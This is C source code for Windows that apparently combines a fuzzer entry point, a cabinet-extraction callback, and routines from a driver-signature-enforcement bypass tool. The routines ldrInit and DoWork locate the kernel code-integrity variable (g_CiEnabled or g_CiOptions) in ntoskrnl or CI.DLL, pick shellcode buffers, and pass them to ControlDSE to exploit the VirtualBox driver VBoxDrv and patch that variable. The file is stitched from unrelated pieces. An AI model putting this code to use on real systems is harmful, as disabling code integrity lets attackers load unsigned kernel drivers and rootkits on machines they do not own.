/*
* main
*
* Purpose:
*
* Program main, process command line options.
*
* Installs VehHandler as a first-call vectored exception handler for the
* lifetime of the run and dispatches on the first command line parameter:
* PARAM_WIN32K selects fuzz_win32k(), anything else fuzz_ntos(). In _DEBUG
* builds g_Log is set when the PARAM_LOG switch is present; it is looked for
* in parameter 2 in win32k mode and in parameter 1 otherwise. Nothing runs if
* the handler cannot be installed. The process always ends via ExitProcess(0),
* so the exit code carries no status.
*
*/
void main()
{
    CHAR    szCmdLine[MAX_PATH + 1];
    PVOID   ExceptionHandler = RtlAddVectoredExceptionHandler(1, &VehHandler);

    if (ExceptionHandler != NULL) {

        RtlSecureZeroMemory(szCmdLine, sizeof(szCmdLine));
        GetCommandLineParamA((LPCSTR)GetCommandLineA(), 1, szCmdLine, MAX_PATH, NULL);

        if (_strcmpi_a(szCmdLine, PARAM_WIN32K) != 0) {
            /* ntos mode: the optional log switch is parameter 1 itself. */
#ifdef _DEBUG
            if (_strcmpi_a(szCmdLine, PARAM_LOG) == 0) {
                g_Log = TRUE;
            }
#endif
            fuzz_ntos();
        }
        else {
            /* win32k mode: the optional log switch is parameter 2. */
            RtlSecureZeroMemory(szCmdLine, sizeof(szCmdLine));
            GetCommandLineParamA((LPCSTR)GetCommandLineA(), 2, szCmdLine, MAX_PATH, NULL);
#ifdef _DEBUG
            if (_strcmpi_a(szCmdLine, PARAM_LOG) == 0) {
                g_Log = TRUE;
            }
#endif
            fuzz_win32k();
        }

        RtlRemoveVectoredExceptionHandler(ExceptionHandler);
    }

    ExitProcess(0);
}
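/*
* fdiNotify
*
* Purpose:
*
* FDI (cabinet) notification callback used to pull one named entry out of a
* cabinet into memory.
*
*   fdintCOPY_FILE       pfdin->pv is the caller's CABDATA record (NULL skips
*                        everything). The lookup name that starts at its Size
*                        member is compared case-insensitively against the
*                        cabinet entry name pfdin->psz1. On a match a fresh
*                        CABDATA plus a pfdin->cb byte buffer are allocated,
*                        Buffer and Size are copied back into the caller's
*                        record, and the new CABDATA is returned as FDI's
*                        "file handle" so the entry gets extracted into it.
*                        0 is returned when the name differs or an allocation
*                        fails, which makes FDI skip the entry.
*   fdintCLOSE_FILE_INFO pfdin->hf is the CABDATA handed out above; only that
*                        record is freed here -- its Buffer now belongs to the
*                        caller's record. Returns 1.
*
* All other notifications return 0.
*
* NOTE(review): pfdin->cb is the size declared inside the cabinet, i.e.
* untrusted input. The write callback (not in this listing) has to stay
* within ReturnData->Size; a cb of 0 is not rejected before LocalAlloc.
* TODO confirm the CABDATA layout that puts the lookup string at &Size.
*
*/
INT_PTR DIAMONDAPI fdiNotify(FDINOTIFICATIONTYPE fdint, PFDINOTIFICATION pfdin)
{
	INT_PTR Result = 0;
	CABDATA *Data, *ReturnData = NULL;
	LPSTR LookupFileName;

	switch (fdint) {

	case fdintCOPY_FILE:

		if (pfdin->pv == NULL)
			break;

		Data = (CABDATA *)pfdin->pv;

		//
		// The name to look for is read from the Size member, which is
		// overwritten with the real size once the entry has been matched.
		//
		LookupFileName = (LPSTR)&Data->Size;
		if (_strcmpi_a(LookupFileName, pfdin->psz1) == 0) {
			ReturnData = LocalAlloc(LPTR, sizeof(CABDATA));
			if (ReturnData) {
				ReturnData->Buffer = LocalAlloc(LPTR, pfdin->cb);
				if (ReturnData->Buffer == NULL) {
					//
					// No buffer: drop the record and report 0 (skip entry).
					//
					LocalFree(ReturnData);
					ReturnData = NULL;
				}
				else {
					ReturnData->Offset = 0;
					ReturnData->Size = pfdin->cb;
					//
					// Publish the buffer to the caller; it owns it from here.
					//
					Data->Buffer = ReturnData->Buffer;
					Data->Size = ReturnData->Size;
				}
				return (INT_PTR)ReturnData;
			}
		}
		break;

	case fdintCLOSE_FILE_INFO: //release ReturnedInfo
		//
		// hf is the CABDATA returned from fdintCOPY_FILE, not an OS handle.
		//
		LocalFree((HLOCAL)pfdin->hf);
		Result = 1;
		break;

	default:
		break;

	}
	return Result;
}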
/*
* ldrInit
*
* Purpose:
*
* Initialize loader global variables.
*
* Opens HKLM\Software\Oracle\VirtualBox (read-only) as the presence check for
* a VirtualBox install; without that key the function returns FALSE and the
* loader exits. For any command other than TSMI_INSTALL that is all it does,
* and it returns TRUE.
*
* For TSMI_INSTALL it additionally:
*   1. selects the TSMI patch table (g_TsmiPatchDataValue / Size) by exact
*      match of the "Version" registry value, keeping TsmiPatchDataValue for
*      any version not listed below;
*   2. enumerates loaded kernel modules (SystemModuleInformation), builds the
*      system32 path of the target image and records its kernel ImageBase:
*      the first module of the list on NT 6.0/6.1, CI_DLL otherwise;
*   3. maps that image into this process with DONT_RESOLVE_DLL_REFERENCES and
*      asks dsfQueryCiEnabled (6.0/6.1) or dsfQueryCiOptions (everything else)
*      for the kernel code-integrity variable, which is stored in g_CiVariable.
*
* From a monitoring standpoint the observable footprint of this routine is
* the registry read, a SystemModuleInformation query from user mode and a
* user-mode LoadLibraryExA of ntoskrnl.exe / CI.DLL.
*
* Parameters:
*  ldrCommand - loader command; only TSMI_INSTALL performs the kernel lookup.
*
* Return:
*  TRUE on success (or when ldrCommand != TSMI_INSTALL and the key exists),
*  FALSE on any failure. Reads g_osv, presumed to be filled in before the call.
*
*/
BOOL ldrInit(
	DWORD ldrCommand
	)
{
	BOOL		bResult = FALSE, bFound = FALSE, cond = FALSE;	// cond never changes: the do/while runs once, "break" is the error exit
	DWORD		dwSize;
	ULONG		rl = 0, c;
	HKEY		hKey = NULL;
	LRESULT		lRet;	// NOTE(review): Reg* APIs return LSTATUS (LONG); LRESULT is wider but the ERROR_SUCCESS compare still holds
	LONG		rel = 0;
	PVOID		MappedKernel = NULL;
	ULONG_PTR	KernelBase = 0L;
	SIZE_T		ModuleSize;

	PLIST_ENTRY				Head, Next;
	PLDR_DATA_TABLE_ENTRY	Entry;
	PRTL_PROCESS_MODULES	miSpace = NULL;

	CHAR	KernelFullPathName[MAX_PATH * 2];
	TCHAR	szBuffer[MAX_PATH + 1];

	do {

		//
		// Presence check: the VirtualBox key decides whether the loader may
		// proceed at all.
		//
		lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), 
			0, KEY_READ, &hKey);
	
		//
		// If key not exists, return FALSE and loader will exit.
		//
		if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) {
			break;
		}

		//
		// If we are not in install mode - leave here (bResult = TRUE: the
		// key exists, nothing else is required).
		//
		if (ldrCommand != TSMI_INSTALL) {
			bResult = TRUE;
			break;
		}

		//
		// Select default patch table.
		//
		g_TsmiPatchDataValue = TsmiPatchDataValue;
		g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue);

		//
		// Read VBox version and select proper table.
		// szBuffer has MAX_PATH + 1 elements and is zeroed first while the
		// query is limited to MAX_PATH TCHARs, so the string stays terminated
		// even if the registry value is not.
		//
		RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
		dwSize = MAX_PATH * sizeof(TCHAR);
		lRet = RegQueryValueEx(hKey, TEXT("Version"), NULL, NULL, (LPBYTE)&szBuffer, &dwSize);
		if (lRet != ERROR_SUCCESS) {
			break;
		}

		//
		// Exact, case-insensitive match of the version string. A version not
		// listed here keeps the default table selected above.
		//
		if (_strcmpi(szBuffer, TEXT("4.3.16")) == 0) {
			g_TsmiPatchDataValue = &TsmiPatchDataValue_4316;
			g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4316);
		}
		if (_strcmpi(szBuffer, TEXT("4.3.18")) == 0) {
			g_TsmiPatchDataValue = &TsmiPatchDataValue_4318;
			g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4318);
		}
		if (_strcmpi(szBuffer, TEXT("4.3.20")) == 0) {
			g_TsmiPatchDataValue = &TsmiPatchDataValue_4320;
			g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4320);
		}
		if (
			(_strcmpi(szBuffer, TEXT("4.3.22")) == 0) ||
			(_strcmpi(szBuffer, TEXT("4.3.24")) == 0)
			)	
		{
			g_TsmiPatchDataValue = &TsmiPatchDataValue_4322_24;
			g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4322_24);
		}
		if (_strcmpi(szBuffer, TEXT("4.3.26")) == 0) {
			g_TsmiPatchDataValue = &TsmiPatchDataValue_4326;
			g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4326);
		}

		//
		// Enumerate loaded drivers.
		// supGetSystemInfo returns a process-heap block; it is released
		// with HeapFree below (in-loop on the normal path, epilogue on
		// the early breaks).
		//
		miSpace = supGetSystemInfo(SystemModuleInformation);
		if (miSpace == NULL) {
			break;
		}
		if (miSpace->NumberOfModules == 0) {
			break;
		}

		//
		// Query system32 folder.
		// GetSystemDirectoryA returns the length written, without the
		// terminator. NOTE(review): when MAX_PATH is too small it returns
		// the required size instead, which is non-zero and not rejected.
		//
		RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName));
		rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
		if (rl == 0) {
			break;
		}
		KernelFullPathName[rl] = (CHAR)'\\';	// terminator comes from the zero-fill / the _strcpy_a below

		//
		// For vista/7 find ntoskrnl.exe
		// The first entry of the module list is taken as the kernel image;
		// no name check is made on it.
		//
		bFound = FALSE;
		if (g_osv.dwMajorVersion == 6) {
			if (g_osv.dwMinorVersion < 2) {

				_strcpy_a(&KernelFullPathName[rl + 1],
					(const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);

				KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
				bFound = TRUE;
			}
		}
		//
		// For 8+, 10 find CI.DLL
		// NOTE(review): if CI_DLL is not in the list KernelBase stays 0 and
		// nothing below rejects that; the mapping still proceeds by name.
		//
		if (bFound == FALSE) {
			_strcpy_a(&KernelFullPathName[rl + 1], CI_DLL);
			for (c = 0; c < miSpace->NumberOfModules; c++)
				if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName],
					CI_DLL) == 0)
				{
					KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase;
					break;
				}
		}

		HeapFree(GetProcessHeap(), 0, miSpace);
		miSpace = NULL;	// cleared so the epilogue does not free it again

		//
		// Map ntoskrnl/CI.DLL in our address space.
		// DONT_RESOLVE_DLL_REFERENCES: mapped for inspection only, no entry
		// point or import resolution runs.
		//
		MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
		if (MappedKernel == NULL) {
			break;
		}

		if (g_osv.dwMajorVersion == 6) {

			// Find g_CiEnabled Vista, Seven
			if (g_osv.dwMinorVersion < 2) {

				// Query module size via PEB loader for bruteforce.
				// Read-only walk of InLoadOrderModuleList under the loader
				// lock; the mapped image is matched by DllBase.
				ModuleSize = 0;
				EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
				Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList;
				Next = Head->Flink;
				while (Next != Head) {
					Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
					if (Entry->DllBase == MappedKernel) {
						ModuleSize = Entry->SizeOfImage;
						break;
					}
					Next = Next->Flink;
				}
				LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);

				// Module not found, abort.
				if (ModuleSize == 0) {
					break;
				}
				// Both dsf* queries take &KernelBase; the value left in it is
				// what g_CiVariable receives below -- the exact in/out
				// contract is defined where they are implemented.
				rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize);
			}
			else {

				// Find g_CiOptions w8+
				rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
			}
		}
		else {

			// Otherwise > NT6.x, find g_CiOptions 10+
			rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
		}

		if (rel == 0)
			break;	// lookup failed; bResult stays FALSE

		g_CiVariable = KernelBase;

		bResult = TRUE;

	} while (cond);

	//
	// Common exit. miSpace is only non-NULL here when the loop left through
	// one of the early breaks before the in-loop HeapFree.
	//
	if (hKey) {
		RegCloseKey(hKey);
	}
	if (miSpace != NULL) {
		HeapFree(GetProcessHeap(), 0, miSpace);
	}
	if (MappedKernel != NULL) {
		FreeLibrary(MappedKernel);
	}

	return bResult;
}
/*
* DoWork
*
* Purpose:
*
* Locate the kernel code-integrity variable and pass the selected payload
* buffer to ControlDSE over the given device handle.
*
* Steps (the lookup mirrors ldrInit):
*   1. enumerate loaded kernel modules (SystemModuleInformation) and build
*      the system32 path of the target image: the first module of the list
*      on NT 6.0/6.1, CI_DLL on everything else; path and base are echoed
*      through OutputDebugStringA with a "[DF] " prefix;
*   2. map the image with DONT_RESOLVE_DLL_REFERENCES and query the variable
*      address via dsfQueryCiEnabled (6.0/6.1, needs the image size taken
*      from the PEB loader list) or dsfQueryCiOptions;
*   3. pick scDisable when bDisable, otherwise scEnableVista7 on 6.0/6.1 and
*      scEnable8Plus elsewhere, and call ControlDSE(hDevice, KernelBase, scBuffer).
*
* The "[DF] ..." debug strings emitted at each step are the routine's most
* distinctive runtime artifact; they appear in any debug-output capture.
*
* Parameters:
*  hDevice  - device handle consumed by ControlDSE (presumably VBoxDrv, per
*             the comment at the call site).
*  bDisable - TRUE selects the scDisable payload, FALSE an enable payload.
*
* Return:
*  Result of ControlDSE, FALSE if any earlier step failed. Reads the global
*  osv (OS version), presumed to be filled in before the call.
*
*/
BOOL DoWork(
	HANDLE hDevice,
	BOOL bDisable
	)
{
	BOOL					bRes = FALSE, bFound, cond;
	ULONG					rl = 0, c;
	LONG					rel = 0;
	PVOID					scBuffer = NULL, MappedKernel = NULL;
	ULONG_PTR				KernelBase = 0L;
	SIZE_T					ModuleSize;
	PLIST_ENTRY				Head, Next;
	PLDR_DATA_TABLE_ENTRY	Entry;
	PRTL_PROCESS_MODULES	miSpace;	// assigned first thing inside the loop, before any break

	CHAR					KernelFullPathName[BUFFER_SIZE];
	CHAR					szOdsText[BUFFER_SIZE];

	cond = FALSE;	// never changes: the do/while runs once, "break" is the error exit

	do {

		//
		// Enumerate loaded drivers.
		// supGetSystemInfo returns a process-heap block; it is released
		// with HeapFree below (in-loop on the normal path, epilogue on
		// the early breaks).
		//
		miSpace = supGetSystemInfo(SystemModuleInformation);
		if (miSpace == NULL) {
			break;
		}
		if (miSpace->NumberOfModules == 0) {
			break;
		}

		//
		// Query system32 folder. The limit passed is MAX_PATH although the
		// array is BUFFER_SIZE -- assumes BUFFER_SIZE > MAX_PATH; TODO confirm.
		// GetSystemDirectoryA returns the length written without terminator
		// (or the required size when the limit is too small; only 0 is
		// treated as failure here).
		//
		RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName));
		rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
		if (rl == 0) {
			break;
		}

		KernelFullPathName[rl] = (CHAR)'\\';	// terminator comes from the zero-fill / the _strcpy_a below

		//
		// Version banner, emitted as a debugger message.
		//
		_strcpy_a(szOdsText, "[DF] Windows v");
		ultostr_a(osv.dwMajorVersion, _strend_a(szOdsText));
		_strcat_a(szOdsText, ".");
		ultostr_a(osv.dwMinorVersion, _strend_a(szOdsText));
		OutputDebugStringA(szOdsText);

		//
		// For vista/7 find ntoskrnl.exe
		// The first entry of the module list is taken as the kernel image;
		// no name check is made on it.
		//
		bFound = FALSE;
		if (osv.dwMajorVersion == 6) {
			if (osv.dwMinorVersion < 2) {

				_strcpy_a(&KernelFullPathName[rl + 1],
					(const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);

				KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
				bFound = TRUE;
			}
		}
		//
		// For 8+, 10 find CI.DLL
		// NOTE(review): if CI_DLL is not in the list KernelBase stays 0 and
		// nothing below rejects that; the mapping still proceeds by name.
		//
		if (bFound == FALSE) {
			_strcpy_a(&KernelFullPathName[rl + 1], CI_DLL);
			for (c = 0; c < miSpace->NumberOfModules; c++)
				if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName],
					CI_DLL) == 0)
				{
					KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase;
					break;
				}
		}

		HeapFree(GetProcessHeap(), 0, miSpace);
		miSpace = NULL;	// cleared so the epilogue does not free it again

		//
		// NOTE(review): szOdsText and KernelFullPathName are the same size,
		// so the 19-char prefix leaves no headroom for a path that fills
		// KernelFullPathName -- confirm BUFFER_SIZE has slack for it.
		//
		_strcpy_a(szOdsText, "[DF] Target module ");
		_strcat_a(szOdsText, KernelFullPathName);
		OutputDebugStringA(szOdsText);

		_strcpy_a(szOdsText, "[DF] Module base ");
		u64tohex_a(KernelBase, _strend_a(szOdsText));
		OutputDebugStringA(szOdsText);

		//
		// Map ntoskrnl/CI.DLL in our address space.
		// DONT_RESOLVE_DLL_REFERENCES: mapped for inspection only, no entry
		// point or import resolution runs.
		//
		MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
		if (MappedKernel == NULL) {
			break;
		}

		//
		// Check if we are in NT6.x branch
		//
		if (osv.dwMajorVersion == 6) {
			//
			// Find g_CiEnabled Vista, Seven
			//
			if (osv.dwMinorVersion < 2) {

				//
				// Query module size via PEB loader for bruteforce.
				// Read-only walk of InLoadOrderModuleList under the loader
				// lock; the mapped image is matched by DllBase.
				//
				ModuleSize = 0;
				EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
				Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList;
				Next = Head->Flink;
				while (Next != Head) {
					Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
					if (Entry->DllBase == MappedKernel) {
						ModuleSize = Entry->SizeOfImage;
						break;
					}
					Next = Next->Flink;
				}
				LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);

				//
				// Module not found, abort.
				//
				if (ModuleSize == 0) {
					break;
				}
				//
				// Both dsf* queries take &KernelBase; the value left in it is
				// what ControlDSE receives below -- the exact in/out contract
				// is defined where they are implemented.
				//
				rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize);
			}
			else {
				//
				// Find g_CiOptions w8+
				//
				rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
			}
		}
		else {
			//
			// Otherwise > NT6.x, find g_CiOptions 10+
			//
			rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
		}

		if (rel == 0)
			break;	// lookup failed; bRes stays FALSE

		_strcpy_a(szOdsText, "[DF] Apply patch to address ");
		u64tohex_a(KernelBase, _strend_a(szOdsText));
		OutputDebugStringA(szOdsText);

		//
		// Select proper shellcode buffer
		//
		if (bDisable) {
			scBuffer = (PVOID)scDisable;
		}
		else {
			//
			//Shellcode for for 8/10+
			//
			scBuffer = (PVOID)scEnable8Plus;

			if (osv.dwMajorVersion == 6) {
				//
				//Shellcode for vista, 7
				//
				if (osv.dwMinorVersion < 2) {
					scBuffer = (PVOID)scEnableVista7;
				}
			}
		}

		//
		// Exploit VBoxDrv.
		// bRes is the only success path out of this function.
		//
		bRes = ControlDSE(hDevice, KernelBase, scBuffer);

	} while (cond);


	//
	// Common exit. miSpace is only non-NULL here when the loop left through
	// one of the early breaks before the in-loop HeapFree.
	//
	if (MappedKernel != NULL) {
		FreeLibrary(MappedKernel);
	}
	if (miSpace != NULL) {
		HeapFree(GetProcessHeap(), 0, miSpace);
	}
	return bRes;
}